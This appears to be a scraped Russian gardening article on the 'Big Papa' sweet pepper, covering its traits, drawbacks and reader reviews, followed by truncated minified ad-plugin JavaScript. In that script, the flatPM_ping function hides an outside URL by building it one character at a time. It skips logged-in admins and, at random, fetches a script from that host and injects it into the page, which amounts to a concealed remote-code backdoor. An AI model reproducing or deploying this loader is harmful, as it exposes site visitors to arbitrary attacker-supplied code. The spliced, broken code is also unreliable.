К преимуществам сорта Биг папа относят сладкий и сочный вкус, плотную мякоть, привлекательный и оригинальный внешний вид. Благодаря небольшим размером перчик отлично подходит для приготовления фаршированных закусок, используется в качестве ингредиента для зимних заготовок и солений. Выращивают урожай в открытом грунте или в теплицах, в уходе овощ не требует специальных знаний и навыков.

Интересно! Болгарский перец отлично сочетается с мясом, рыбой и птицей, гармонирует со вкусом других овощей. Особенно оригинальный вкус получается, если приготовить перчик Биг папа на гриле. Овощ приобретет красивый поджаренный вид и пикантный аромат. Приготовить перец можно как на даче, так и дома, на домашнем гриле. Добавить изюминку помогут ароматные специи и пряности, а также бальзамический или винный уксус.

Минус: Биг папа подходит для выращивания лишь в средней полосе России. В условиях Урала и Сибири перец показывает низкую урожайность. Помимо этого, овощ имеет средний иммунитет перед болезнями и вредителями.

Отзывы

Что говорят о перце Биг папа другие огородники? Приведем несколько отзывов с популярных интернет-форумов.

Алиса, г. Волгоград: «Люблю все необычное, вот и решила посадить перчик Биг папа. Урожай превзошел все мои ожидания! Собрала с грядки 10 кг перца! Красивый темно-вишневый овощ пришелся по вкусу всей семье».

Мария, г. Орел: «Высаживаю сорт Биг папа уже третий раз. Предпочитаю выращивать в теплице, чтобы защитить от непогоды. Хлопот сорт не доставляет, не нужно подвязывать или пасынковать кусты. Использую урожай для приготовления салатов и гарниров, оставшиеся перчики замораживаю на зиму».

Павел, г. Пенза: «По рекомендации соседа посадил Биг папа в прошлом году. Высаживал рассадой, соблюдал все сроки посева. Однако в огороде перчики прижились плохо, медленно набирали вес и цвет. Остался разочарован, так как надеялся на другой результат».

Заключение

Перец Биг папа любят как начинающие садоводы, так и огородники со стажем. Высаживают овощ рассадой, которую подготавливают за 1—1,5 месяца. Лучшие предшественники для сорта — капуста или зелень. В уходе перчик хлопот не доставляет, главное — вовремя поливать и удобрять грядки.

Собирают урожай, когда перчики станут упругими, приобретут темно-вишневый оттенок. Плоды вырастают средних размеров, мясистые, имеют глянцевую поверхность. Используют овощ в свежем виде, а также для приготовления закусок, салатов и зимних заготовок.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};